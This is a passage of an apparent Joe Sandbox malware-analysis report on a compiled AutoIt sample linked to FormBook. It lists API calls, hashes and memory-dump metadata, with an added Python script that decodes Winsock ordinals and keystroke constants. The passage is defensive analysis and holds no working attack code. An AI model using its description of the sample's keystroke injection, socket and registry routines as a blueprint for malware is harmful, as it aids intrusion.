• Instruction Fuzzy Hash: 5D5104A06043D9BEFB3246348C05BFA7EEB6B47344F08848DE2D58E9C2C298DC84D750
APIs
• GetParent.USER32(00000000), ref: 006F12B5
• GetKeyboardState.USER32(?), ref: 006F12CA
• SetKeyboardState.USER32(?), ref: 006F132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006F1357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006F1374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006F13B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006F13D9
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
• Instruction ID: a356d94d058e409f5c41224bfe00b85976c432ace7070bb7c0d9ab5f98fd464f
• Opcode Fuzzy Hash: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
• Instruction Fuzzy Hash: D25104A15047D9BDFB3287248C45BFABFAB6F07380F088489E2D84E9C2D395AC94D754
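Reading the two records directly above together: both wrap GetKeyboardState/SetKeyboardState around four PostMessageW calls whose message is 0x100 (WM_KEYDOWN, routine at 006F12B5) or 0x101 (WM_KEYUP, routine at 006F149C) and whose wParam is 0x10, 0x11, 0x12 or 0x5B (VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN). That is the press and release halves of a synthetic modifier-key routine, the pattern an AutoIt runtime's Send() produces; given the "likely a compiled AutoIt script" signature this is most plausibly runtime code rather than the FormBook payload, which is an inference, not something the report states. Likewise the WSOCK32 record at 00706F14 imports ordinal #17, which is recvfrom in the Winsock 1.1 export table. The following Python is an added example, not part of the Joe Sandbox output or its IDA plugin: it parses APIs bullet lines in the format shown on this page and decodes those ordinals and constants. The sample lines are copied from the records above; the ordinal and constant tables are the documented Winsock 1.1 and Win32 values.

```python
"""Decode the raw "APIs" bullet lines of a Joe Sandbox disassembly record.

Added example; not part of the Joe Sandbox report or its IDA plugin.
It resolves WSOCK32 ordinal imports such as "#17" and the USER32 window
message / virtual-key constants that the records show as raw hex.
"""
import re
from typing import List, NamedTuple, Tuple, Union

# Winsock 1.1 export ordinals (the same numbers in wsock32.dll and ws2_32.dll).
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 9: "htons",
    12: "inet_ntoa", 16: "recv", 17: "recvfrom", 18: "select", 19: "send",
    20: "sendto", 23: "socket",
}
# Window messages and wParam constants that appear in the records above.
WINDOW_MESSAGES = {
    0x00A1: "WM_NCLBUTTONDOWN", 0x00B0: "EM_GETSEL", 0x00F0: "BM_GETCHECK",
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
HIT_TEST = {2: "HTCAPTION"}

# Matches "• Name.MODULE(arg,arg,...), ref: ADDR" and "• Name.MODULE ref: ADDR".
# "Part of subcall function ..." lines do not match and are skipped.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>#?\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]


class ApiCall(NamedTuple):
    name: str                # import name, WSOCK32 ordinals already resolved
    module: str
    args: Tuple[Arg, ...]    # int per hex argument, None for "?", str otherwise
    ref: int                 # call-site address


def resolve_name(name: str, module: str) -> str:
    """Map an ordinal import like "#17" to its Winsock name when known."""
    if name.startswith("#") and module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name


def _arg(text: str) -> Arg:
    text = text.strip()
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:       # a string argument such as DllGetClassObject
        return text


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every direct-call bullet in a record's APIs block."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"] or ""
        args = tuple(_arg(a) for a in raw.split(",") if a.strip())
        calls.append(ApiCall(resolve_name(m["name"], m["module"]),
                             m["module"], args, int(m["ref"], 16)))
    return calls


def describe(call: ApiCall) -> str:
    """Render one call, decoding message and wParam constants where known."""
    a = call.args
    if call.name in ("PostMessageW", "SendMessageW") and len(a) >= 3 and isinstance(a[1], int):
        msg = WINDOW_MESSAGES.get(a[1], f"0x{a[1]:04X}")
        wparam = a[2]
        if msg in ("WM_KEYDOWN", "WM_KEYUP") and wparam in VIRTUAL_KEYS:
            detail = VIRTUAL_KEYS[wparam]
        elif msg == "WM_NCLBUTTONDOWN" and wparam in HIT_TEST:
            detail = HIT_TEST[wparam]
        elif isinstance(wparam, int):
            detail = f"0x{wparam:X}"
        else:
            detail = "?" if wparam is None else wparam
        return f"{call.ref:08X}: {call.name}({msg}, {detail})"
    return f"{call.ref:08X}: {call.module}!{call.name}"


def key_events(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Collect the (message, virtual key) pairs a routine synthesizes."""
    events = []
    for c in calls:
        if c.name in ("PostMessageW", "SendMessageW") and len(c.args) >= 3 \
                and c.args[1] in (0x0100, 0x0101):
            vk = c.args[2]
            events.append((WINDOW_MESSAGES[c.args[1]],
                           VIRTUAL_KEYS.get(vk, f"0x{vk:X}" if isinstance(vk, int) else "?")))
    return events


# Bullet lines copied from records on this page: the WSOCK32 routine at
# 00706F14, the WM_KEYDOWN routine at 006F12B5, the WM_KEYUP routine at
# 006F149C and the WM_NCLBUTTONDOWN call at 0071B843.
SAMPLE_API_LINES = """\
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00706F14
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00706F35
• WSAGetLastError.WSOCK32(00000000), ref: 00706F48
  • Part of subcall function 006EAE14: _strlen.LIBCMT ref: 006EAE1E
• _memmove.LIBCMT ref: 007070C1
• GetKeyboardState.USER32(?), ref: 006F12CA
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006F1357
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006F13D9
• PostMessageW.USER32(?,00000101,00000012,?), ref: 006F15A5
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0071B843
"""

if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_API_LINES):
        print(describe(call))
    print(key_events(parse_api_lines(SAMPLE_API_LINES)))
```

The argument columns are the values the plugin could recover from the call-site pushes, so a "?" is a register or stack pointer it did not resolve; the decoder keeps those as None rather than guessing. Ordinal resolution is restricted to WSOCK32 because the table is only valid for Winsock 1.1 exports.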
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 1f2b662333d539172f4b4d327fa8ec9c6fa797687c47ff913866181d50943ff2
• Instruction ID: 6adb2b261d9b678becbddbfeadc389b704b1ebe96095d90278683fd9c639eaa7
• Opcode Fuzzy Hash: 1f2b662333d539172f4b4d327fa8ec9c6fa797687c47ff913866181d50943ff2
• Instruction Fuzzy Hash: 8D41D8A5C2012876CB51EBB4CC869DF73AAAF04310F50856AF619E3222FB34D755C7AD
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006EDAC5
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006EDAFB
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006EDB0C
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006EDB8E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,r$DllGetClassObject
• API String ID: 753597075-4218317632
• Opcode ID: d2d7d97046c93406e509bc50a2bd709294dd1e6d388d2c058c04ef7479e18d07
• Instruction ID: 28e644f695e66440a38319526ae36674e1449976cfc1f15a9fbc8c919ed10753
• Opcode Fuzzy Hash: d2d7d97046c93406e509bc50a2bd709294dd1e6d388d2c058c04ef7479e18d07
• Instruction Fuzzy Hash: 1E41C3B1602348EFDB05CF16C884A9A7BBAEF44350F1181ADED059F245E7B0DD40CBA0
APIs
  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F38D3,?), ref: 006F48C7
  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F38D3,?), ref: 006F48E0
• lstrcmpiW.KERNEL32(?,?), ref: 006F38F3
• _wcscmp.LIBCMT ref: 006F390F
• MoveFileW.KERNEL32(?,?), ref: 006F3927
• _wcscat.LIBCMT ref: 006F396F
• SHFileOperationW.SHELL32(?), ref: 006F39DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: dac6eee3d2512d94bab7d1f7f6f0ab440dc0d04cc18f6fc691c2f03eafb92372
• Instruction ID: 63e562258fb067e4815ca59b7122c5cf6c704a93e41eb7ed7e055af3d30edd8a
• Opcode Fuzzy Hash: dac6eee3d2512d94bab7d1f7f6f0ab440dc0d04cc18f6fc691c2f03eafb92372
• Instruction Fuzzy Hash: F14193B150C3489EC791EF64C4419EFB7EDAF89340F00192EF599C3251EA74D689C756
APIs
• _memset.LIBCMT ref: 00717519
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007175C0
• IsMenu.USER32(?), ref: 007175D8
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00717620
• DrawMenuBar.USER32 ref: 00717633
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: a136389ae80ce08ee70018eee1347b2ec397de48bd274aa7cc731cf66c076010
• Instruction ID: 4d5f54d97c2f785ba934b89b032cf0be93b532df86619cb1051c6749c360c0d5
• Opcode Fuzzy Hash: a136389ae80ce08ee70018eee1347b2ec397de48bd274aa7cc731cf66c076010
• Instruction Fuzzy Hash: 99412775A04609EFDB24DF58D884EDABBF9FF18350F048129E95997290D738AD90CFA0
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0071125C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00711286
• FreeLibrary.KERNEL32(00000000), ref: 0071133D
  • Part of subcall function 0071122D: RegCloseKey.ADVAPI32(?), ref: 007112A3
  • Part of subcall function 0071122D: FreeLibrary.KERNEL32(?), ref: 007112F5
  • Part of subcall function 0071122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00711318
• RegDeleteKeyW.ADVAPI32(?,?), ref: 007112E0
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0071655B
• GetWindowLongW.USER32(01654CF0,000000F0), ref: 0071658E
• GetWindowLongW.USER32(01654CF0,000000F0), ref: 007165C3
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007165F5
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0071661F
• GetWindowLongW.USER32(00000000,000000F0), ref: 00716630
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0071664A
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
  • Part of subcall function 007080A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007064D9
• WSAGetLastError.WSOCK32(00000000), ref: 007064E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706521
• connect.WSOCK32(00000000,?,00000010), ref: 0070652A
• WSAGetLastError.WSOCK32 ref: 00706534
• closesocket.WSOCK32(00000000), ref: 0070655D
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706576
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EE0FA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EE120
• SysAllocString.OLEAUT32(00000000), ref: 006EE123
• SysAllocString.OLEAUT32 ref: 006EE144
• SysFreeString.OLEAUT32 ref: 006EE14D
• StringFromGUID2.OLE32(?,?,00000028), ref: 006EE167
• SysAllocString.OLEAUT32(?), ref: 006EE175
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007178A1
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007178AE
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007178B9
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007178C8
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007178D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006B4292,?), ref: 006B41E3
• GetProcAddress.KERNEL32(00000000), ref: 006B41EA
• EncodePointer.KERNEL32(00000000), ref: 006B41F6
• DecodePointer.KERNEL32(00000001,006B4292,?), ref: 006B4213
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006B41B8), ref: 006B42B8
• GetProcAddress.KERNEL32(00000000), ref: 006B42BF
• EncodePointer.KERNEL32(00000000), ref: 006B42CA
• DecodePointer.KERNEL32(006B41B8), ref: 006B42E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
APIs
  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710548
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00710588
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007105AB
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007105D4
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00710617
• RegCloseKey.ADVAPI32(00000000), ref: 00710624
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
APIs
• GetMenu.USER32(?), ref: 00715A82
• GetMenuItemCount.USER32(00000000), ref: 00715AB9
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00715AE1
• GetMenuItemID.USER32(?,?), ref: 00715B50
• GetSubMenu.USER32(?,?), ref: 00715B5E
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00715BAF
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• VariantInit.OLEAUT32(?), ref: 006EF3F7
• VariantClear.OLEAUT32(00000013), ref: 006EF469
• VariantClear.OLEAUT32(00000000), ref: 006EF4C4
• _memmove.LIBCMT ref: 006EF4EE
• VariantClear.OLEAUT32(?), ref: 006EF53B
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006EF569
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
                                                APIs
                                                • _memset.LIBCMT ref: 006F2747
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2792
                                                • IsMenu.USER32(00000000), ref: 006F27B2
                                                • CreatePopupMenu.USER32 ref: 006F27E6
                                                • GetMenuItemCount.USER32(000000FF), ref: 006F2844
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006F2875
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                • Instruction ID: 7b3f09d5cfd59009c9fc5a64edec321f0044b32293d6bbc1621d203ce57f7a53
                                                • Opcode Fuzzy Hash: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                • Instruction Fuzzy Hash: BC519E70A0124BEBDF24CF68C898AFEBBF6AF45354F108169E6259B2D0D7709948CF51
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0069179A
                                                • GetWindowRect.USER32(?,?), ref: 006917FE
